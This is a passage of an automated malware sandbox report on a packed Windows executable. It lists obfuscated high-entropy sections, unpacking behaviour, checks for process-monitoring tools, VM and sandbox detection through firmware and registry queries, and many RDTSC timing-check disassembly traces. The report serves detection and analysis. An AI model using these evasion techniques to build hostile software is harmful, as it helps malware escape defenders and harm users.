            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic file information: File size 1865728 > 1048576
            Source: file.exeStatic PE information: Raw size of mbsuitke is bigger than: 0x100000 < 0x19da00

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.bb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mbsuitke:EW;iyarxzjx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mbsuitke:EW;iyarxzjx:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x1ca976 should be: 0x1c7cf4
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: mbsuitke
            Source: file.exeStatic PE information: section name: iyarxzjx
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0156E8DE push FFFFFF97h; retf 0_3_0156E8F6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_015756AE push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_015756AE push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_015756AE push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_015756AE push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_015756AE push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01566134 push 00000043h; iretd 0_3_01566136
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01575657 push FFFFFF97h; retf 0_3_015756A6
            Source: file.exeStatic PE information: section name: entropy: 7.97990031272369
            Source: file.exeStatic PE information: section name: mbsuitke entropy: 7.954841662083077

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92033 second address: D9204D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEAA376h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9204D second address: D92086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA0FE8h 0x00000007 jmp 00007FF9ACEA0FE9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92086 second address: D9208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9208C second address: D92090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D92090 second address: D9209B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9209B second address: D920B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF9ACEA0FD6h 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007FF9ACEA0FD6h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D920B1 second address: D920C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF9ACEAA371h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7CEF2 second address: D7CF17 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF9ACEA0FD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF9ACEA0FE7h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7CF17 second address: D7CF1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D911E1 second address: D911E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D911E6 second address: D911EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D911EC second address: D911FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF9ACEA0FD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91648 second address: D91650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91650 second address: D91654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94DC8 second address: D94DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94DCC second address: D94DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1B9Fh], eax 0x00000010 push 00000000h 0x00000012 mov ecx, dword ptr [ebp+122D36A3h] 0x00000018 push ECC83BB5h 0x0000001d pushad 0x0000001e jng 00007FF9ACEA0FDCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94DF2 second address: D94EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF9ACEAA368h 0x0000000a popad 0x0000000b add dword ptr [esp], 1337C4CBh 0x00000012 mov esi, dword ptr [ebp+122D36A7h] 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FF9ACEAA368h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+122D2711h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FF9ACEAA368h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 movsx edx, bx 0x00000059 push 00000003h 0x0000005b or edi, 630735E2h 0x00000061 call 00007FF9ACEAA369h 0x00000066 jl 00007FF9ACEAA36Eh 0x0000006c jns 00007FF9ACEAA368h 0x00000072 push eax 0x00000073 jne 00007FF9ACEAA36Ah 0x00000079 mov eax, dword ptr [esp+04h] 0x0000007d jmp 00007FF9ACEAA372h 0x00000082 mov eax, dword ptr [eax] 0x00000084 push eax 0x00000085 push edx 0x00000086 jbe 00007FF9ACEAA37Ah 0x0000008c jmp 00007FF9ACEAA374h 0x00000091 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94EB7 second address: D94EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94EBD second address: D94EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94EC1 second address: D94F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007FF9ACEA0FDEh 0x00000011 pop eax 0x00000012 mov edi, 0337737Ah 0x00000017 mov dword ptr [ebp+122D1809h], eax 0x0000001d lea ebx, dword ptr [ebp+1245BAC8h] 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FF9ACEA0FD8h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d clc 0x0000003e push eax 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94F16 second address: D94F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D94F6D second address: D95002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA0FDCh 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, 528CBAD0h 0x00000012 push edx 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FF9ACEA0FD8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 adc si, F791h 0x00000035 call 00007FF9ACEA0FD9h 0x0000003a jbe 00007FF9ACEA0FDEh 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007FF9ACEA0FE1h 0x00000047 jg 00007FF9ACEA0FD8h 0x0000004d popad 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 pushad 0x00000053 pushad 0x00000054 js 00007FF9ACEA0FD6h 0x0000005a je 00007FF9ACEA0FD6h 0x00000060 popad 0x00000061 push eax 0x00000062 push edx 0x00000063 jg 00007FF9ACEA0FD6h 0x00000069 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95002 second address: D9504C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEAA374h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007FF9ACEAA36Fh 0x00000012 pushad 0x00000013 jmp 00007FF9ACEAA370h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 pop esi 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9504C second address: D95069 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA0FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95069 second address: D950A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FF9ACEAA366h 0x00000009 jns 00007FF9ACEAA366h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pop eax 0x00000013 mov edx, dword ptr [ebp+122D389Fh] 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d and esi, dword ptr [ebp+122D2F3Ah] 0x00000023 push 00000003h 0x00000025 mov dword ptr [ebp+122D17F5h], edx 0x0000002b call 00007FF9ACEAA369h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D950A2 second address: D950B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D950B2 second address: D950C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D950C4 second address: D950CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D950CA second address: D950E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEAA371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D950E8 second address: D950EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D950EC second address: D9514B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007FF9ACEAA375h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FF9ACEAA368h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1245BAD3h] 0x00000031 mov edi, dword ptr [ebp+122D36B3h] 0x00000037 push eax 0x00000038 pushad 0x00000039 jmp 00007FF9ACEAA36Bh 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4FFF second address: DB5023 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF9ACEA0FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FF9ACEA0FE5h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3003 second address: DB3031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF9ACEAA366h 0x0000000a pop ebx 0x0000000b jmp 00007FF9ACEAA370h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jne 00007FF9ACEAA366h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jbe 00007FF9ACEAA366h 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3031 second address: DB3045 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF9ACEA0FD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FF9ACEA0FD6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3D09 second address: DB3D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB3D0F second address: DB3D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF9ACEA0FE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FF9ACEA0FDCh 0x00000011 js 00007FF9ACEA0FD6h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b jno 00007FF9ACEA0FD6h 0x00000021 jnc 00007FF9ACEA0FD6h 0x00000027 jmp 00007FF9ACEA0FE9h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83AFD second address: D83B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D83B01 second address: D83B0D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF9ACEA0FD6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB48C0 second address: DB48C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB48C5 second address: DB48CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB48CB second address: DB48CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D889A6 second address: D889AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBBF07 second address: DBBF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF0FF second address: DBF109 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF9ACEA2286h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF109 second address: DBF121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FF9ACE9409Eh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF121 second address: DBF127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF127 second address: DBF149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE940A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007FF9ACE94096h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBF149 second address: DBF14F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE8E5 second address: DBE8E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE8E9 second address: DBE8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED08 second address: DBED0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBED0C second address: DBED10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0B80 second address: DC0C38 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FF9ACE940A1h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FF9ACE940A9h 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c js 00007FF9ACE94098h 0x00000022 pushad 0x00000023 js 00007FF9ACE94096h 0x00000029 push edx 0x0000002a pop edx 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 jmp 00007FF9ACE940A3h 0x00000036 pop eax 0x00000037 call 00007FF9ACE94099h 0x0000003c jmp 00007FF9ACE940A0h 0x00000041 push eax 0x00000042 jmp 00007FF9ACE940A1h 0x00000047 mov eax, dword ptr [esp+04h] 0x0000004b jmp 00007FF9ACE9409Dh 0x00000050 mov eax, dword ptr [eax] 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 jne 00007FF9ACE94096h 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f jbe 00007FF9ACE94096h 0x00000065 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0C38 second address: DC0C4C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC0D81 second address: DC0D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007FF9ACE94096h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 ja 00007FF9ACE94096h 0x00000016 pop eax 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1348 second address: DC134D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC134D second address: DC1353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1353 second address: DC1357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC1828 second address: DC182C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC182C second address: DC183E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FF9ACEA2288h 0x00000010 rdtsc
